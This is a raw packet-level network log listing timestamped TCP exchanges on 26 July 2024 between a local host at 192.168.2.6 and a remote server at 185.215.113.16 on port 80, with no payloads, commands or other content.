Jul 26, 2024 12:57:08.793664932 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.793683052 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.793701887 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.793728113 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.793764114 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.793879032 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.793924093 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.793956041 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.794006109 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.794061899 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.794080973 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.794102907 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.794126987 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.794217110 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.794236898 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.794260979 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.794270992 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.794291973 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.794300079 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.794316053 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.794342995 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.794680119 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.794698954 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.794727087 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.794734001 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.794749975 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.794760942 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.794778109 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.794790983 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.794802904 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.794821978 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.794831991 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.794851065 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.794862032 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.794882059 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.794891119 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.794920921 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.795387030 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.795444012 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.795514107 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.795526981 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.795558929 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.795572042 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.795583963 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.795602083 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.795612097 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.795641899 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.795749903 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.795764923 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.795797110 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.795804977 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.795819998 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.795833111 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.795849085 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.795870066 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.796061039 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.796076059 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.796106100 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.796113014 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.796129942 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.796135902 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.796156883 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.796190023 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.796317101 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.796366930 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.796413898 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.796428919 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.796459913 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.796493053 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.796654940 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.796674013 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.796701908 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.796709061 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.796726942 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.796737909 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.796753883 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.796776056 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.797065020 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.797084093 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.797111034 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.797116995 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.797136068 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.797144890 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.797163010 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.797187090 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.798702955 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.798752069 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.798774958 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.798794985 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.798825979 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.798849106 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.965795040 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.965841055 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.965862989 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.965989113 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.965989113 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.966027021 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.966047049 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.966072083 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.966083050 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.966108084 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.966114998 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.966130972 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.966159105 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.966406107 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.966420889 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.966461897 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.966479063 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.966495991 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.966517925 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.966536045 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.966547012 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.966562986 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.966577053 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.966586113 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.966603041 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.966614962 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.966633081 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.966643095 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.966669083 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.967423916 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.967439890 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.967467070 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.967474937 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.967497110 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.967504025 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.967519999 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.967529058 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.967545033 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.967557907 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.967566967 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.967586040 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.967595100 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.967612982 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.967622995 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.967639923 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.967649937 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.967679977 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.968346119 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.968365908 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.968391895 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.968398094 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.968415022 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.968424082 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.968440056 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.968452930 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.968461990 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.968492031 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.968513966 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.968533993 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.968552113 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.968574047 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.968592882 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.968600035 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.968611956 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.968638897 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.969228029 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.969244003 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.969271898 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.969280958 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.969299078 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.969307899 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.969324112 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.969336987 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.969345093 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.969363928 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.969373941 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.969391108 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.969400883 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.969420910 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.969429016 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.969448090 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.969458103 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.969485044 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.970148087 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.970166922 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.970195055 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.970201969 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.970215082 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.970228910 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.970238924 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.970256090 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.970266104 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.970283985 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.970292091 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.970309973 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.970319986 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.970338106 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.970347881 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.970366001 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.970376968 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.970402002 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.971075058 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.971090078 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.971117973 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.971124887 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.971141100 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.971151114 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.971174955 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.971182108 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.971190929 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.971206903 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.971216917 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.971235991 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.971251011 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.971265078 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.971281052 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.971298933 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.971313953 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.971335888 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.971959114 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.971973896 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.972004890 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.972012043 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.972028017 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.972039938 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.972050905 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.972069025 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.972078085 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.972095966 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.972105980 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.972122908 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.972135067 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.972152948 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.972162008 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.972181082 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.972191095 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.972218037 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.972896099 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.972912073 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.972943068 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.972949982 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.972965956 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.972976923 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.972987890 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.973012924 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.973018885 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.973040104 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:08.973062992 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:08.973074913 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.031306028 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.031325102 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.031380892 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.031409025 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.031435966 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.031450987 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.031476021 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.031498909 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.031553984 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.031577110 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.031595945 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.031605005 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.031622887 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.031636000 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.031646013 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.031672955 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.032021999 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.032037020 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.032068968 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.032075882 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.032093048 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.032104015 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.032119036 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.032134056 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.032143116 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.032161951 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.032171965 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.032191992 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.032202005 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.032229900 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.032654047 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.032674074 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.032696009 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.032718897 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.091871977 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.091902971 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.091926098 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.091943026 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.091984034 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.092001915 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.092048883 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.092187881 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.092216969 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.092231035 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.092250109 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.092259884 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.092279911 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.092289925 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.092335939 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.092850924 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.092873096 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.092897892 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.092909098 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.092927933 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.092935085 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.092952967 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.092959881 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.092976093 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.092983961 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.092999935 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.093013048 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.093023062 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.093039989 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.093051910 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.093070984 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.093080997 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.093110085 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.093507051 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.093527079 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.093550920 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.093574047 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.093594074 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.093610048 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.093621016 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.093641996 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.093662977 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.093683004 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.093699932 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.093725920 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.097012997 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.097042084 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.097063065 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.097074032 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.097095966 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.097106934 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.097126007 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.097145081 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.097161055 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.097177029 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.097198963 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.097208977 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.097227097 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.097245932 CEST	60779	80	192.168.2.6	185.215.113.16
